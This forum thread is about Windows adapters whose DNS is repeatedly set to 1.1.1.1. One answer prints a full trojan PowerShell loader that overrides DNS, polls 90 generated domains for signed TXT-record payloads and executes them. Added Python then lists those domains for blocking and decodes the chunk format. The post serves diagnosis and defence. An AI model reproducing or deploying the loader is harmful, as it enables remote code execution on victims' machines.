As the title says, whenever I set a network adapter to obtain its settings via DHCP, a few hours later or the next day I notice that several adapters (WiFi, LAN (not physically connected) and the Tailscale interface) have had their DNS settings switched to manual, and the manually configured DNS is always 1.1.1.1.
I have reset the Windows network stack (netsh int ip reset) and scanned the computer for malware with different antivirus products, without any meaningful result.
Is there any way to log which program makes these changes? Has anyone run into the same problem and knows of software that can do this?
By the way, I do have a pihole DNS server in my network that is handed out via DHCP. Maybe some software on my machine is trying to bypass it?
Other computers on the same network (also running Windows 11) do not have the problem.
Answer 1
So in the end it was a trojan. When I deleted the powershell file I found, my antivirus detected it, but interestingly it had not before. The code I was able to extract is below. Unfortunately, I could not figure out how the powershell was being started...
.\debug.ps1
'8F628C95-FCF4-411C-B363-B3A21C9D437E';
$env:_v = 'd22062023';
get-wmiobject win32_networkadapter | % { Set-DnsClientServerAddress -InterfaceIndex $_.InterfaceIndex -ServerAddresses ("1.1.1.1","1.0.0.1") -Confirm:$false };
$ms = [IO.MemoryStream]::new();
function Microsoft {
    param (
        $windows,$linux
    )
    try {
        $dns = Resolve-DnsName -Name $windows -Type 'TXT'
        $ms.SetLength(0);
        $ms.Position = 0;
        foreach ($txt in $dns) {
            try {
                if ($txt.Type -ne 'TXT') {
                    continue;
                }
                $pkt = [string]::Join('', $txt.Strings);
                if ($pkt[0] -eq '.') {
                    $dp = ([type]((([regex]::Matches('trevnoC','.','RightToLeft') | ForEach {$_.value}) -join ''))).GetMethods()[306].Invoke($null, @(($pkt.Substring(1).Replace('_', '+'))));
                    $ms.Position = [BitConverter]::ToUInt32($dp, 0);
                    $ms.Write($dp, 4, $dp.Length - 4);
                }
            }
            catch {
            }
        }
        if ($ms.Length -gt 136) {
            $ms.Position = 0;
            $sig = [byte[]]::new(128);
            $timestamp = [byte[]]::new(8);
            $buffer = [byte[]]::new($ms.Length - 136);
            $ms.Read($sig, 0, 128) | Out-Null;
            $ms.Read($timestamp, 0, 8) | Out-Null;
            $ms.Read($buffer, 0, $buffer.Length) | Out-Null;
            $pubkey = [Security.Cryptography.RSACryptoServiceProvider]::new();
            [byte[]]$bytarr = 6,2,0,0,0,164,0,0,82,83,65,49,0,4,0,0,1,0,1,0,171,136,19,139,215,31,169,242,133,11,146,105,79,13,140,88,119,0,2,249,79,17,77,152,228,162,31,56,117,89,68,182,194,170,250,16,3,78,104,92,37,37,9,250,164,244,195,118,92,190,58,20,35,134,83,10,229,114,229,137,244,178,10,31,46,80,221,73,129,240,183,9,245,177,196,77,143,71,142,60,5,117,241,54,2,116,23,225,145,53,46,21,142,158,206,250,181,241,8,110,101,84,218,219,99,196,195,112,71,93,55,111,218,209,12,101,165,45,13,36,118,97,232,193,245,221,180,169
            $pubkey.ImportCspBlob($bytarr);
            if ($pubkey.VerifyData($buffer, [Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256'), $sig)) {
                return @{
                    timestamp = ([System.BitConverter]::ToUInt64($timestamp, 0));
                    text = ([Text.Encoding]::UTF8.GetString($buffer));
                };
            }
        }
    }
    catch {
    }
    return $null;
}
while ($true) {
    try {
        $ko = @{
            timestamp = 0;
            text = '';
        };
        foreach ($c in (@("eu", "in"))) {
            foreach ($a in (@('you','wiki','blog','face','ny'))) {
                foreach ($b in (@('arena','store','desk','box','reads','book','times','news','share'))) {
                    try {
                        $wowo = "$a$b.$c";
                        $roro = Microsoft $wowo $wowo;
                        if ($null -ne $roro) {
                            if ($roro.timestamp -gt $ko.timestamp) {
                                $ko = $roro;
                            }
                        }
                    }
                    catch {
                    }
                }
            }
        }
        if ($ko.text) {
            $job = Start-Job -ScriptBlock ([scriptblock]::Create($ko.text));
            $job | Wait-Job -Timeout 15500;
            $job | Stop-Job;
        }
    }
    catch {
    }
    Start-Sleep -Seconds 35;
}
QQZeFvgbP : The term 'QQZeFvgbP' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Users\max\Documents\debug.ps1:3 char:1
+ QQZeFvgbP
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (QQZeFvgbP:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
JFekEPXxTgh : The term 'JFekEPXxTgh' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
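The loader above builds its command-and-control names from three fixed word lists, pulls TXT records from them, reassembles offset-tagged base64 chunks into a blob and checks a 128-byte RSA signature before running the payload. The following Python is an added example (not code from the post or from the malware) that a defender can use to enumerate those 90 domains for a Pi-hole blocklist or query-log search, and to recognise the chunk and blob layout when inspecting captured DNS responses; the sample TXT strings in the test are constructed.

```python
import base64
import struct
from itertools import product

# Word lists copied from the loader script in the answer above.
TLDS = ("eu", "in")
PREFIXES = ("you", "wiki", "blog", "face", "ny")
SUFFIXES = ("arena", "store", "desk", "box", "reads", "book", "times", "news", "share")

def c2_domains():
    """All 2 * 5 * 9 = 90 names the loop polls, in the script's own order,
    ready for a Pi-hole blocklist or for searching the query log."""
    return [f"{a}{b}.{c}" for c, a, b in product(TLDS, PREFIXES, SUFFIXES)]

def parse_chunk(txt):
    """Decode one TXT record in the loader's chunk format, or return None.
    A chunk starts with '.', the rest is base64 with '_' standing in for '+',
    and the first 4 decoded bytes are a little-endian offset into the buffer."""
    if not txt.startswith("."):
        return None
    try:
        raw = base64.b64decode(txt[1:].replace("_", "+"), validate=True)
    except ValueError:  # binascii.Error (bad alphabet/padding) is a ValueError
        return None
    if len(raw) < 4:
        return None
    return struct.unpack_from("<I", raw, 0)[0], raw[4:]

def reassemble(records):
    """Rebuild the blob the way the MemoryStream writes do: seek to offset, write."""
    buf = bytearray()
    for txt in records:
        parsed = parse_chunk(txt)
        if parsed is None:
            continue
        off, data = parsed
        end = off + len(data)
        if len(buf) < end:
            buf.extend(b"\0" * (end - len(buf)))
        buf[off:end] = data
    return bytes(buf)

def split_blob(blob):
    """Layout the script expects once the blob exceeds 136 bytes:
    128-byte RSA signature, 8-byte little-endian timestamp, then the payload."""
    if len(blob) <= 136:
        return None
    ts = struct.unpack("<Q", blob[128:136])[0]
    return blob[:128], ts, blob[136:]
```

The signature check itself is the only part the script gets right from a defender's point of view: since only the holder of the matching private key can produce a payload that verifies, the practical response is blocking the names and removing the script, not tampering with the records.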